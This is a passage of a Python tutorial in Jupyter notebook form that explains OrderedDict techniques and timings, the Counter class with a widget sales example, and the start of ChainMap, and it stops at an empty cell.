{'a': 1, 'b': 2, 'c': 3, 'd': 4}
('a', 1)
{'b': 2, 'c': 3, 'd': 4}


#### Move to End

Next let's look at the `move_to_end` method, which can move any key to either the beginning or the end of the dictionary.

Moving a key to the end of the dictionary is easy - we simply pop the item, and insert it again - because of the guaranteed insertion order, this means the key will now be placed at the end of the dictionary:

In [36]:
d2 = dict(a=1, b=2, c=3, d=4)
print(d2)
key = 'b'
d2[key] = d2.pop(key)
print(d2)

{'a': 1, 'b': 2, 'c': 3, 'd': 4}
{'a': 1, 'c': 3, 'd': 4, 'b': 2}


Moving to the beginning however is not as easy - the only way I could think of was to take the desired key and move it to the end first. Then, take every key preceding it, and pop them off and add them back to the dictionary one by one, up to, but not including, the target key we wanted to move to the beginning of the dictionary.

In other words something like this:

```a b c d e f```

To move `c` to the front, first pop it and add it to the dictionary:
``` a b d e f c```

Now we do the same thing to every key preceding `c`, essentially moving each key one by one to the end of the dictionary:

```b d e f c a```

```d e f c a b```

```e f c a b d```

```f c a b d e```

```c a b d e f```

We can code it this way:

In [50]:
d = dict(a=1, b=2, c=3, d=4, e=5, f=6)
key = 'c'

print(d.keys())

# first move desired key to end
d[key] = d.pop(key)  
print(d.keys())

keys = list(d.keys())[:-1]
for key in keys:
    d[key] = d.pop(key)
    print(d.keys())
    
print(d)

dict_keys(['a', 'b', 'c', 'd', 'e', 'f'])
dict_keys(['a', 'b', 'd', 'e', 'f', 'c'])
dict_keys(['b', 'd', 'e', 'f', 'c', 'a'])
dict_keys(['d', 'e', 'f', 'c', 'a', 'b'])
dict_keys(['e', 'f', 'c', 'a', 'b', 'd'])
dict_keys(['f', 'c', 'a', 'b', 'd', 'e'])
dict_keys(['c', 'a', 'b', 'd', 'e', 'f'])
{'c': 3, 'a': 1, 'b': 2, 'd': 4, 'e': 5, 'f': 6}


We can combine both into a single function:

In [51]:
def move_to_end(d, key, *, last=True):
    d[key] = d.pop(key)
    
    if not last:
        for key in list(d.keys())[:-1]:
            d[key] = d.pop(key)       

In [52]:
d = dict(a=1, b=2, c=3, d=4, e=5, f=6)

In [53]:
move_to_end(d, 'c')
print(d)

{'a': 1, 'b': 2, 'd': 4, 'e': 5, 'f': 6, 'c': 3}


In [46]:
move_to_end(d, 'c', last=False)
print(d)

{'c': 3, 'a': 1, 'b': 2, 'd': 4, 'e': 5, 'f': 6}
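
One possible alternative for moving a key to the front, offered only as a sketch: instead of popping and re-inserting each key one by one, we can snapshot the remaining items, clear the dictionary, and rebuild it with the target key first. The helper name `move_to_front` is hypothetical, and this has not been timed against the approach above - it still has to touch every item:

```python
def move_to_front(d, key):
    """Move `key` to the beginning of the plain dict `d`, in place."""
    value = d.pop(key)            # raises KeyError if key is missing
    remaining = list(d.items())   # snapshot of the other items, in order
    d.clear()
    d[key] = value                # the target key is inserted first
    d.update(remaining)           # the rest follow in their original order


d = dict(a=1, b=2, c=3, d=4, e=5, f=6)
move_to_front(d, 'c')
print(d)  # {'c': 3, 'a': 1, 'b': 2, 'd': 4, 'e': 5, 'f': 6}
```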


#### Equality Comparison

Lastly let's look at equality (`==`) comparisons.
Even though Python 3.6+ guarantees key ordering based on the insertion order, two dictionaries with the same key/values but in different order will compare equal, but not so with `OrderedDict`.

To achieve the same type of "key-order-sensitive" comparison we therefore need to make sure of two things:
1. the dictionaries are equal - i.e. have the same key/value pairs
2. the order of the keys is the same in both dictionaries

We can achieve this by comparing the dictionaries themselves and then comparing the order of their keys:

In [1]:
d1 = {'a': 10, 'b': 20, 'c': 30}
d2 = {'b': 20, 'c': 30, 'a': 10}

In [2]:
d1 == d2

True

Now just comparing the `keys()` views will not work:

In [4]:
d1.keys() == d2.keys()

True

Remember that the `keys()` view behaves like a `set`, so comparisons will be `True` as long as the same elements (keys) are present in both sets - but ordering does not matter.

Instead, we can materialize these views as lists, and then compare the lists:

In [5]:
list(d1.keys()) == list(d2.keys())

False

So to test for "key-order-sensitive" equality, we can simply do this:

In [6]:
d1 == d2 and list(d1.keys()) == list(d2.keys())

False

Of course, materializing the lists incurs some overhead, so instead we could use iteration through both key views and make sure each corresponding key is equal.

There are a number of ways to do this, here I'm going to use `zip` to do it:

In [7]:
def dict_equal_sensitive(d1, d2):
    if d1 == d2:
        for k1, k2 in zip(d1.keys(), d2.keys()):
            if k1 != k2:
                return False
        return True
    else:
        return False

In [8]:
dict_equal_sensitive(d1, d2)

False

In [9]:
dict_equal_sensitive(d1, d1)

True

If you want a pure functional programming approach that does not use a loop, we can do it this way too, using `all` and `map`:

In [28]:
def dict_equal_sensitive(d1, d2):
    if d1 == d2:
        return all(map(lambda el: el[0] == el[1], 
                       zip(d1.keys(), d2.keys())
                      )
                  )
    else:
        return False

In [36]:
dict_equal_sensitive(d1, d2)

False

In [37]:
dict_equal_sensitive(d1, d1)

True
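
Another way to write the same check, as a sketch: since `items()` iterates in insertion order, we can compare the `(key, value)` pairs position by position in a single pass. The function name `dict_equal_ordered` is made up for this example, and the result is cross-checked against `OrderedDict`'s own order-sensitive equality:

```python
from collections import OrderedDict


def dict_equal_ordered(d1, d2):
    # Same length, and each (key, value) pair matches position by position
    return len(d1) == len(d2) and all(
        item1 == item2 for item1, item2 in zip(d1.items(), d2.items())
    )


d1 = {'a': 10, 'b': 20, 'c': 30}
d2 = {'b': 20, 'c': 30, 'a': 10}

print(dict_equal_ordered(d1, d2))          # False
print(dict_equal_ordered(d1, d1))          # True
# Cross-check against OrderedDict's order-sensitive equality
print(OrderedDict(d1) == OrderedDict(d2))  # False
```

The length check is needed because `zip` stops at the shorter of its two inputs.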

So, we can perform all these operations on a standard dictionary, but it is a lot more work to do so - for now I would stick to using an `OrderedDict` when I need those specific methods beyond just a guaranteed key order. If the guaranteed key order is all I need, then a plain `dict` will work just fine.

#### Timings

What about timings?

Let's look at a few timings to see the performance difference between plain `dicts` and `OrderedDicts`.

In [54]:
from timeit import timeit

In [55]:
def create_dict(n=100):
    d = dict()
    for i in range(n):
        d[i] = i
    return d

In [56]:
def create_ordered_dict(n=100):
    d = OrderedDict()
    for i in range(n):
        d[i] = i
    return d

In [58]:
timeit('create_dict(10_000)', globals=globals(), number=1_000)

0.46366495298570953

In [59]:
timeit('create_ordered_dict(10_000)', globals=globals(), number=1_000)

0.718640872015385

As you can see, creating an OrderedDict has slightly more overhead.

Let's see if retrieving a value by key from an `OrderedDict` is slower than from a plain `dict`:

In [60]:
d1 = create_dict(10_000)
d2 = create_ordered_dict(10_000)

timeit('d1[9_999]', globals=globals(), number=100_000)

0.005689098994480446

In [61]:
timeit('d2[9_999]', globals=globals(), number=100_000)

0.005895093985600397

So no significant difference between these two.


Let's see how pop (first and last) differs:

In [64]:
n = 1_000_000
d1 = create_dict(n)
timeit('d1.popitem()', globals = globals(), number=n)

0.06503099398105405

In [66]:
n = 1_000_000
d2 = create_ordered_dict(n)
timeit('d2.popitem(last=True)', globals = globals(), number=n)

0.26186515000881627

Perhaps not surprisingly, the built-in `dict` is substantially faster at popping the last item of the dictionary.

What about popping the first item?

In [70]:
n = 100_000
d1 = create_dict(n)
timeit('popitem(d1, last=False)', globals = globals(), number=n)

2.9098294480063487

In [71]:
n = 100_000
d2 = create_ordered_dict(n)
timeit('d2.popitem(last=False)', globals = globals(), number=n)

0.038049360999139026

As you can see, substantially faster in an `OrderedDict`.

You can try the other methods (`move_to_end` and equality testing) yourself - if you do, please post your results in the **Q&A** section!
Or maybe you can come up with more efficient alternatives to what we have here for pop, move, etc.

##  Counter

The `Counter` dictionary is one that specializes for helping with, you guessed it, counters!

Actually we used a `defaultdict` earlier to do something similar:

In [1]:
from collections import defaultdict, Counter

Let's say we want to count the frequency of each character in a string:

In [2]:
sentence = 'the quick brown fox jumps over the lazy dog'

In [3]:
counter = defaultdict(int)

In [4]:
for c in sentence:
    counter[c] += 1

In [5]:
counter

defaultdict(int,
            {'t': 2,
             'h': 2,
             'e': 3,
             ' ': 8,
             'q': 1,
             'u': 2,
             'i': 1,
             'c': 1,
             'k': 1,
             'b': 1,
             'r': 2,
             'o': 4,
             'w': 1,
             'n': 1,
             'f': 1,
             'x': 1,
             'j': 1,
             'm': 1,
             'p': 1,
             's': 1,
             'v': 1,
             'l': 1,
             'a': 1,
             'z': 1,
             'y': 1,
             'd': 1,
             'g': 1})

We can do the same thing using a `Counter` - unlike the `defaultdict` we don't specify a default factory - it's always zero (it's a counter after all):

In [6]:
counter = Counter()
for c in sentence:
    counter[c] += 1

In [7]:
counter

Counter({'t': 2,
         'h': 2,
         'e': 3,
         ' ': 8,
         'q': 1,
         'u': 2,
         'i': 1,
         'c': 1,
         'k': 1,
         'b': 1,
         'r': 2,
         'o': 4,
         'w': 1,
         'n': 1,
         'f': 1,
         'x': 1,
         'j': 1,
         'm': 1,
         'p': 1,
         's': 1,
         'v': 1,
         'l': 1,
         'a': 1,
         'z': 1,
         'y': 1,
         'd': 1,
         'g': 1})

OK, so if that's all there was to `Counter` it would be pretty odd to have a data structure different from `defaultdict`.

But `Counter` has a slew of additional methods which make sense in the context of counters:

1. Iterate through all the elements of counters, but repeat the elements as many times as their frequency
2. Find the `n` most common (by frequency) elements
3. Decrement the counters based on another `Counter` (or iterable)
4. Increment the counters based on another `Counter` (or iterable)
5. Specialized constructor for additional flexibility

If you are familiar with multisets, then this is essentially a data structure that can be used for multisets.

#### Constructor

It is so common to create a frequency distribution of elements in an iterable, that this is supported automatically:

In [8]:
c1 = Counter('able was I ere I saw elba')
c1

Counter({'a': 4,
         'b': 2,
         'l': 2,
         'e': 4,
         ' ': 6,
         'w': 2,
         's': 2,
         'I': 2,
         'r': 1})

Of course this works for iterables in general, not just strings:

In [9]:
import random

In [10]:
random.seed(0)

In [11]:
my_list = [random.randint(0, 10) for _ in range(1_000)]

In [12]:
c2 = Counter(my_list)

In [13]:
c2

Counter({6: 95,
         0: 97,
         4: 91,
         8: 76,
         7: 94,
         5: 89,
         9: 85,
         3: 80,
         2: 88,
         1: 107,
         10: 98})

We can also initialize a `Counter` object by passing in keyword arguments, or even a dictionary:

In [14]:
c2 = Counter(a=1, b=10)
c2

Counter({'a': 1, 'b': 10})

In [15]:
c3 = Counter({'a': 1, 'b': 10})
c3

Counter({'a': 1, 'b': 10})

Technically we can store values other than integers in a `Counter` object - it's possible but of limited use since the default is still `0` irrespective of what other values are contained in the object.
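
A minimal sketch of what that looks like with float values (the key names below are made up for illustration):

```python
from collections import Counter

weights = Counter(apples=1.5, pears=0.25)
weights['apples'] += 2       # in-place arithmetic works with floats

print(weights['apples'])     # 3.5
print(weights['plums'])      # 0  (an int, not 0.0)
print('plums' in weights)    # False - the lookup did not add the key
```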

#### Finding the n most Common Elements

Let's find the `n` most common words (by frequency) in a paragraph of text. Words are considered delimited by white space or punctuation marks such as `.`, `,`, `!`, etc - basically anything except a letter or a digit.
This is actually quite difficult to do, so we'll use a close enough approximation that will cover most cases just fine, using a regular expression:

In [16]:
import re

In [17]:
sentence = '''
his module implements pseudo-random number generators for various distributions.

For integers, there is uniform selection from a range. For sequences, there is uniform selection of a random element, a function to generate a random permutation of a list in-place, and a function for random sampling without replacement.

On the real line, there are functions to compute uniform, normal (Gaussian), lognormal, negative exponential, gamma, and beta distributions. For generating distributions of angles, the von Mises distribution is available.

Almost all module functions depend on the basic function random(), which generates a random float uniformly in the semi-open range [0.0, 1.0). Python uses the Mersenne Twister as the core generator. It produces 53-bit precision floats and has a period of 2**19937-1. The underlying implementation in C is both fast and threadsafe. The Mersenne Twister is one of the most extensively tested random number generators in existence. However, being completely deterministic, it is not suitable for all purposes, and is completely unsuitable for cryptographic purposes.'''

In [18]:
words = re.split(r'\W', sentence)

In [19]:
words

['',
 'his',
 'module',
 'implements',
 'pseudo',
 'random',
 'number',
 'generators',
 'for',
 'various',
 'distributions',
 '',
 '',
 'For',
 'integers',
 '',
 'there',
 'is',
 'uniform',
 'selection',
 'from',
 'a',
 'range',
 '',
 'For',
 'sequences',
 '',
 'there',
 'is',
 'uniform',
 'selection',
 'of',
 'a',
 'random',
 'element',
 '',
 'a',
 'function',
 'to',
 'generate',
 'a',
 'random',
 'permutation',
 'of',
 'a',
 'list',
 'in',
 'place',
 '',
 'and',
 'a',
 'function',
 'for',
 'random',
 'sampling',
 'without',
 'replacement',
 '',
 '',
 'On',
 'the',
 'real',
 'line',
 '',
 'there',
 'are',
 'functions',
 'to',
 'compute',
 'uniform',
 '',
 'normal',
 '',
 'Gaussian',
 '',
 '',
 'lognormal',
 '',
 'negative',
 'exponential',
 '',
 'gamma',
 '',
 'and',
 'beta',
 'distributions',
 '',
 'For',
 'generating',
 'distributions',
 'of',
 'angles',
 '',
 'the',
 'von',
 'Mises',
 'distribution',
 'is',
 'available',
 '',
 '',
 'Almost',
 'all',
 'module',
 'functions',
 'depen

But what are the frequencies of each word, and what are the 5 most frequent words?

In [20]:
word_count = Counter(words)

In [21]:
word_count

Counter({'': 38,
         'his': 1,
         'module': 2,
         'implements': 1,
         'pseudo': 1,
         'random': 7,
         'number': 2,
         'generators': 2,
         'for': 4,
         'various': 1,
         'distributions': 3,
         'For': 3,
         'integers': 1,
         'there': 3,
         'is': 7,
         'uniform': 3,
         'selection': 2,
         'from': 1,
         'a': 8,
         'range': 2,
         'sequences': 1,
         'of': 5,
         'element': 1,
         'function': 3,
         'to': 2,
         'generate': 1,
         'permutation': 1,
         'list': 1,
         'in': 4,
         'place': 1,
         'and': 5,
         'sampling': 1,
         'without': 1,
         'replacement': 1,
         'On': 1,
         'the': 7,
         'real': 1,
         'line': 1,
         'are': 1,
         'functions': 2,
         'compute': 1,
         'normal': 1,
         'Gaussian': 1,
         'lognormal': 1,
         'negative': 1,
         'expon

In [22]:
word_count.most_common(5)

[('', 38), ('a', 8), ('random', 7), ('is', 7), ('the', 7)]
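
Notice that the empty string tops the list: `re.split` produces an empty string between consecutive delimiters (a comma followed by a space, for example). One way to avoid this, sketched below, is to extract the words with `re.findall` instead of splitting on the delimiters. The sample text here is made up, and lower-casing the text first is an extra assumption (so that `For` and `for` would be counted together):

```python
import re
from collections import Counter

text = 'The cat saw the dog. The dog ran, the cat sat; the end!'

# findall returns only the runs of word characters, so no empty strings
words = re.findall(r'\w+', text.lower())
word_count = Counter(words)

print('' in word_count)           # False
print(word_count.most_common(1))  # [('the', 5)]
```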

#### Using Repeated Iteration

In [23]:
c1 = Counter('abba')
c1

Counter({'a': 2, 'b': 2})

In [24]:
for c in c1:
    print(c)

a
b


However, we can have an iteration that repeats the counter keys as many times as the indicated frequency:

In [25]:
for c in c1.elements():
    print(c)

a
a
b
b


What's interesting about this functionality is that we can turn this around and use it as a way to create an iterable that has repeating elements.

Suppose we want to iterate through a list of (integer) numbers that are each repeated as many times as the number itself.

For example 1 should repeat once, 2 should repeat twice, and so on.

This is actually not that easy to do!

Here's one possible way to do it:

In [26]:
l = []
for i in range(1, 11):
    for _ in range(i):
        l.append(i)
print(l)

[1, 2, 2, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6, 7, 7, 7, 7, 7, 7, 7, 8, 8, 8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9, 9, 9, 9, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10]


But we could use a `Counter` object as well:

In [27]:
c1 = Counter()
for i in range(1, 11):
    c1[i] = i

In [28]:
c1

Counter({1: 1, 2: 2, 3: 3, 4: 4, 5: 5, 6: 6, 7: 7, 8: 8, 9: 9, 10: 10})

In [29]:
print(c1.elements())

<itertools.chain object at 0x1047aa518>


So you'll notice that we have a `chain` object here. That's one big advantage to using the `Counter` object - the repeated iterable does not actually exist as a list like our previous implementation - this is a lazy iterable, so this is far more memory efficient.

And we can iterate through that `chain` quite easily:

In [30]:
for i in c1.elements():
    print(i, end=', ')

1, 2, 2, 3, 3, 3, 4, 4, 4, 4, 5, 5, 5, 5, 5, 6, 6, 6, 6, 6, 6, 7, 7, 7, 7, 7, 7, 7, 8, 8, 8, 8, 8, 8, 8, 8, 9, 9, 9, 9, 9, 9, 9, 9, 9, 10, 10, 10, 10, 10, 10, 10, 10, 10, 10, 

Just for fun, how could we reproduce this functionality using a plain dictionary?

In [31]:
class RepeatIterable:
    def __init__(self, **kwargs):
        self.d = kwargs
        
    def __setitem__(self, key, value):
        self.d[key] = value
        
    def __getitem__(self, key):
        self.d[key] = self.d.get(key, 0)
        return self.d[key]

In [32]:
r = RepeatIterable(x=10, y=20)

In [33]:
r.d

{'x': 10, 'y': 20}

In [34]:
r['a'] = 100

In [35]:
r['a']

100

In [36]:
r['b']

0

In [37]:
r.d

{'x': 10, 'y': 20, 'a': 100, 'b': 0}

Now we have to implement that `elements` iterator:

In [38]:
class RepeatIterable:
    def __init__(self, **kwargs):
        self.d = kwargs
        
    def __setitem__(self, key, value):
        self.d[key] = value
        
    def __getitem__(self, key):
        self.d[key] = self.d.get(key, 0)
        return self.d[key]
    
    def elements(self):
        for k, frequency in self.d.items():
            for i in range(frequency):
                yield k

In [39]:
r = RepeatIterable(a=2, b=3, c=1)

In [40]:
for e in r.elements():
    print(e, end=', ')

a, a, b, b, b, c, 
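
The nested loops in `elements` can also be expressed with `itertools`, similar in spirit to the `chain` object we saw `Counter.elements()` return. This is only a sketch, and the helper name `repeat_elements` is hypothetical:

```python
from collections import Counter
from itertools import chain, repeat


def repeat_elements(frequencies):
    # Lazily yield each key as many times as its associated count
    return chain.from_iterable(
        repeat(key, count) for key, count in frequencies.items()
    )


freqs = dict(a=2, b=3, c=1)
print(list(repeat_elements(freqs)))     # ['a', 'a', 'b', 'b', 'b', 'c']
print(list(Counter(freqs).elements()))  # ['a', 'a', 'b', 'b', 'b', 'c']
```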

#### Updating from another Iterable or Counter

Lastly let's see how we can update a `Counter` object using another `Counter` object. 

When both objects have the same key, we have a choice - do we add the count of one to the count of the other, or do we subtract them?

We can do either, by using the `update` (additive) or `subtract` methods.

In [41]:
c1 = Counter(a=1, b=2, c=3)
c2 = Counter(b=1, c=2, d=3)

c1.update(c2)
print(c1)

Counter({'c': 5, 'b': 3, 'd': 3, 'a': 1})


On the other hand we can subtract instead of add counters:

In [42]:
c1 = Counter(a=1, b=2, c=3)
c2 = Counter(b=1, c=2, d=3)

c1.subtract(c2)
print(c1)

Counter({'a': 1, 'b': 1, 'c': 1, 'd': -3})


Notice the key `d` - since `Counters` default missing keys to `0`, when `d: 3` in `c2` was subtracted from `c1`, the counter for `d` in `c1` was first defaulted to `0`, giving `0 - 3 = -3`.

Just as the constructor for a `Counter` can take different arguments, so too can the `update` and `subtract` methods.

In [43]:
c1 = Counter('aabbccddee')
print(c1)
c1.update('abcdef')
print(c1)

Counter({'a': 2, 'b': 2, 'c': 2, 'd': 2, 'e': 2})
Counter({'a': 3, 'b': 3, 'c': 3, 'd': 3, 'e': 3, 'f': 1})
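
One thing worth keeping in mind is that `Counter.update` **adds** to existing counts, whereas `update` on a plain `dict` replaces the value. A small sketch contrasting the two, and also showing `subtract` with an iterable (the variable names are just for illustration):

```python
from collections import Counter

c = Counter('aabbcc')
c.subtract('abx')        # subtract one for each element of the iterable
print(c['a'], c['b'], c['c'], c['x'])  # 1 1 2 -1

c.update({'a': 5})       # adds 5 to the existing count for 'a'
print(c['a'])            # 6

plain = {'a': 1}
plain.update({'a': 5})   # a plain dict replaces the value instead
print(plain['a'])        # 5
```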


#### Mathematical Operations

These `Counter` objects also support several other mathematical operations when both operands are `Counter` objects. In all these cases the result is a new `Counter` object.

* `+`: adds the counts like `update`, but returns a new `Counter` object instead of an in-place update (and, like `-`, discards zero and negative results)
* `-`: subtracts one counter from another, but discards zero and negative values
* `&`: keeps the **minimum** of the key values
* `|`: keeps the **maximum** of the key values

In [44]:
c1 = Counter('aabbcc')
c2 = Counter('abc')
c1 + c2

Counter({'a': 3, 'b': 3, 'c': 3})

In [45]:
c1 - c2

Counter({'a': 1, 'b': 1, 'c': 1})

In [46]:
c1 = Counter(a=5, b=1)
c2 = Counter(a=1, b=10)

c1 & c2

Counter({'a': 1, 'b': 1})

In [47]:
c1 | c2

Counter({'a': 5, 'b': 10})

The **unary** `+` can also be used to remove any non-positive count from the Counter:

In [48]:
c1 = Counter(a=10, b=-10)
+c1

Counter({'a': 10})

The **unary** `-` changes the sign of each counter, and removes any non-positive result:

In [49]:
-c1

Counter({'b': 10})
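
To make the difference between the `-` operator and the `subtract` method concrete, here is a short sketch (the counters are made up for illustration). The operator drops any result that is zero or negative, while the method keeps it:

```python
from collections import Counter

c1 = Counter(a=1, b=2)
c2 = Counter(a=3, b=1)

# operator: the negative result for 'a' is discarded
print(c1 - c2)             # Counter({'b': 1})

# method: in-place, and the negative result is kept
c3 = Counter(c1)           # copy, so c1 is left untouched
c3.subtract(c2)
print(c3)                  # Counter({'b': 1, 'a': -2})

# the binary + also discards results that are not positive
print(c1 + Counter(a=-1))  # Counter({'b': 2})
```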

##### Example

Let's assume you are working for a company that produces different kinds of widgets.
You are asked to identify the top 3 best selling widgets.

You have two separate data sources - one data source can give you a history of all widget orders (widget name, quantity), while another data source can give you a history of widget refunds (widget name, quantity refunded).

From these two data sources, you need to determine the top selling widgets (taking refunds into account of course).

Let's simulate both of these lists:

In [50]:
import random
random.seed(0)

widgets = ['battery', 'charger', 'cable', 'case', 'keyboard', 'mouse']

orders = [(random.choice(widgets), random.randint(1, 5)) for _ in range(100)]
refunds = [(random.choice(widgets), random.randint(1, 3)) for _ in range(20)]

In [51]:
orders

[('case', 4),
 ('battery', 3),
 ('keyboard', 4),
 ('case', 3),
 ('case', 3),
 ('keyboard', 2),
 ('keyboard', 2),
 ('cable', 2),
 ('battery', 5),
 ('cable', 5),
 ('mouse', 5),
 ('charger', 3),
 ('battery', 1),
 ('mouse', 3),
 ('case', 5),
 ('battery', 3),
 ('case', 3),
 ('keyboard', 2),
 ('keyboard', 4),
 ('case', 5),
 ('cable', 1),
 ('keyboard', 1),
 ('battery', 4),
 ('mouse', 1),
 ('keyboard', 4),
 ('cable', 2),
 ('mouse', 3),
 ('mouse', 1),
 ('charger', 5),
 ('charger', 2),
 ('charger', 5),
 ('case', 1),
 ('battery', 3),
 ('keyboard', 4),
 ('battery', 3),
 ('keyboard', 3),
 ('mouse', 1),
 ('keyboard', 3),
 ('keyboard', 2),
 ('keyboard', 5),
 ('keyboard', 3),
 ('case', 1),
 ('keyboard', 4),
 ('cable', 5),
 ('charger', 3),
 ('charger', 2),
 ('charger', 1),
 ('keyboard', 3),
 ('case', 1),
 ('battery', 2),
 ('charger', 1),
 ('battery', 5),
 ('mouse', 4),
 ('mouse', 5),
 ('cable', 5),
 ('charger', 2),
 ('mouse', 5),
 ('case', 5),
 ('cable', 4),
 ('case', 3),
 ('battery', 3),
 ('keyboard',

In [52]:
refunds

[('battery', 3),
 ('charger', 1),
 ('cable', 3),
 ('cable', 1),
 ('keyboard', 2),
 ('mouse', 1),
 ('battery', 2),
 ('mouse', 2),
 ('keyboard', 3),
 ('cable', 3),
 ('cable', 2),
 ('mouse', 2),
 ('charger', 3),
 ('mouse', 1),
 ('case', 3),
 ('battery', 2),
 ('mouse', 1),
 ('keyboard', 2),
 ('charger', 1),
 ('case', 2)]

Let's first load these up into counter objects.

To do this we're going to iterate through the various lists and update our counters:

In [53]:
sold_counter = Counter()
refund_counter = Counter()

for order in orders:
    sold_counter[order[0]] += order[1]

for refund in refunds:
    refund_counter[refund[0]] += refund[1]

In [54]:
sold_counter

Counter({'case': 41,
         'battery': 61,
         'keyboard': 65,
         'cable': 39,
         'mouse': 46,
         'charger': 35})

In [55]:
refund_counter

Counter({'battery': 7,
         'charger': 5,
         'cable': 9,
         'keyboard': 7,
         'mouse': 7,
         'case': 5})

In [56]:
net_counter = sold_counter - refund_counter

In [57]:
net_counter

Counter({'case': 36,
         'battery': 54,
         'keyboard': 58,
         'cable': 30,
         'mouse': 39,
         'charger': 30})

In [58]:
net_counter.most_common(3)

[('keyboard', 58), ('battery', 54), ('mouse', 39)]

We could actually do this a little differently, not using loops to populate our initial counters.

Recall the `repeat()` function in `itertools`:

In [59]:
from itertools import repeat

In [60]:
list(repeat('battery', 5))

['battery', 'battery', 'battery', 'battery', 'battery']

In [61]:
orders[0]

('case', 4)

In [62]:
list(repeat(*orders[0]))

['case', 'case', 'case', 'case']

So we could use the `repeat()` function to essentially repeat each widget for each item of `orders`. We need to chain this up for each element of `orders` - this will give us a single iterable that we can then use in the constructor for a `Counter` object. We can do this using a generator expression for example:

In [63]:
from itertools import chain

In [64]:
list(chain.from_iterable(repeat(*order) for order in orders))

['case',
 'case',
 'case',
 'case',
 'battery',
 'battery',
 'battery',
 'keyboard',
 'keyboard',
 'keyboard',
 'keyboard',
 'case',
 'case',
 'case',
 'case',
 'case',
 'case',
 'keyboard',
 'keyboard',
 'keyboard',
 'keyboard',
 'cable',
 'cable',
 'battery',
 'battery',
 'battery',
 'battery',
 'battery',
 'cable',
 'cable',
 'cable',
 'cable',
 'cable',
 'mouse',
 'mouse',
 'mouse',
 'mouse',
 'mouse',
 'charger',
 'charger',
 'charger',
 'battery',
 'mouse',
 'mouse',
 'mouse',
 'case',
 'case',
 'case',
 'case',
 'case',
 'battery',
 'battery',
 'battery',
 'case',
 'case',
 'case',
 'keyboard',
 'keyboard',
 'keyboard',
 'keyboard',
 'keyboard',
 'keyboard',
 'case',
 'case',
 'case',
 'case',
 'case',
 'cable',
 'keyboard',
 'battery',
 'battery',
 'battery',
 'battery',
 'mouse',
 'keyboard',
 'keyboard',
 'keyboard',
 'keyboard',
 'cable',
 'cable',
 'mouse',
 'mouse',
 'mouse',
 'mouse',
 'charger',
 'charger',
 'charger',
 'charger',
 'charger',
 'charger',
 'charger',
 'ch

In [65]:
order_counter = Counter(chain.from_iterable(repeat(*order) for order in orders))

In [66]:
order_counter

Counter({'case': 41,
         'battery': 61,
         'keyboard': 65,
         'cable': 39,
         'mouse': 46,
         'charger': 35})

What if we don't want to use a `Counter` object?
We can still do it (relatively easily) as follows:

In [67]:
net_sales = {}
for order in orders:
    key = order[0]
    cnt = order[1]
    net_sales[key] = net_sales.get(key, 0) + cnt
    
for refund in refunds:
    key = refund[0]
    cnt = refund[1]
    net_sales[key] = net_sales.get(key, 0) - cnt

# eliminate non-positive values (to mimic what - does for Counters)
net_sales = {k: v for k, v in net_sales.items() if v > 0}

# we now have to sort the dictionary
# this means sorting the keys based on the values
sorted_net_sales = sorted(net_sales.items(), key=lambda t: t[1], reverse=True)

# Top three
sorted_net_sales[:3]

[('keyboard', 58), ('battery', 54), ('mouse', 39)]

##  ChainMap

Remember the `chain` function in the `itertools` module? That allowed us to chain multiple iterables together to look like a single iterable.

The `ChainMap` in the `collections` module is somewhat similar - it allows us to chain multiple dictionaries (mapping types more generally) so it looks like a single mapping type.
But there are some wrinkles: 
* when we request a key lookup, what happens if the same key occurs in more than one dictionary?
* we can actually update, insert and delete elements from a ChainMap - how does that work?

Let's look at some simple examples where we do not have key collisions first:

In [1]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d3 = {'e': 5, 'f': 6}

Now we can always create a new dictionary that contains all those keys by using unpacking, or even starting with an empty dictionary and updating it three times with each of the dicts `d1, d2` and `d3`:

In [2]:
d = {**d1, **d2, **d3}

In [3]:
print(d)

{'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5, 'f': 6}


or:

In [4]:
d = {}
d.update(d1)
d.update(d2)
d.update(d3)

In [5]:
print(d)

{'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5, 'f': 6}


But in a way this is wasteful because we had to copy the data into a new dictionary.

Instead we can use `ChainMap`:

In [6]:
from collections import ChainMap

In [7]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d3 = {'e': 5, 'f': 6}
d = ChainMap(d1, d2, d3)

In [8]:
print(d)

ChainMap({'a': 1, 'b': 2}, {'c': 3, 'd': 4}, {'e': 5, 'f': 6})


In [9]:
isinstance(d, dict)

False

So, the result is not a dictionary, but it is a mapping type that we can use almost **like** a dictionary:

In [10]:
d['a']

1

In [11]:
d['c']

3

In [12]:
for k, v in d.items():
    print(k, v)

d 4
c 3
f 6
b 2
a 1
e 5


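**Note** that the iteration order here does not follow the order in which the keys were inserted, unlike a regular Python dictionary. In the Python version used to produce this output the order was **not** guaranteed; since Python 3.7 the documentation specifies that a `ChainMap` is iterated by scanning the mappings last to first.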

Now what happens if we have key 'collisions'?

In [13]:
d1 = {'a': 1, 'b': 2}
d2 = {'b': 20, 'c': 3}
d3 = {'c': 30, 'd': 4}

In [14]:
d = ChainMap(d1, d2, d3)

In [15]:
d['b']

2

In [16]:
d['c']

3

As you can see, the value returned corresponds to the value of the **first** key found in the chain. (So note the difference between this and when we unpack the dictionaries into a new dictionary, where the "last" key effectively overwrites any "previous" key.)
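To make the difference in precedence concrete, here is a small side-by-side sketch using the same three dictionaries. The names `chained`, `merged` and `reversed_chain` are just illustrative names chosen here:

```python
from collections import ChainMap

d1 = {'a': 1, 'b': 2}
d2 = {'b': 20, 'c': 3}
d3 = {'c': 30, 'd': 4}

chained = ChainMap(d1, d2, d3)   # lookups stop at the first map containing the key
merged = {**d1, **d2, **d3}      # later dictionaries overwrite earlier ones

print(chained['b'], merged['b'])  # 2 20
print(chained['c'], merged['c'])  # 3 30

# To get the same precedence as unpacking, list the maps in reverse order
reversed_chain = ChainMap(d3, d2, d1)
print(reversed_chain['b'], reversed_chain['c'])  # 20 30
```

So if we want "last one wins" semantics from a chain map, we simply put the highest-priority dictionary first.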

In fact, if we iterate through all the items, you'll notice that, as we would expect from a mapping type, we do not have duplicate keys, and moreover the associated value is the **first** one encountered in the chain:

In [17]:
for k, v in d.items():
    print(k, v)

d 4
c 3
b 2
a 1


Now let's look at how ChainMap objects handle inserts, deletes and updates:

In [18]:
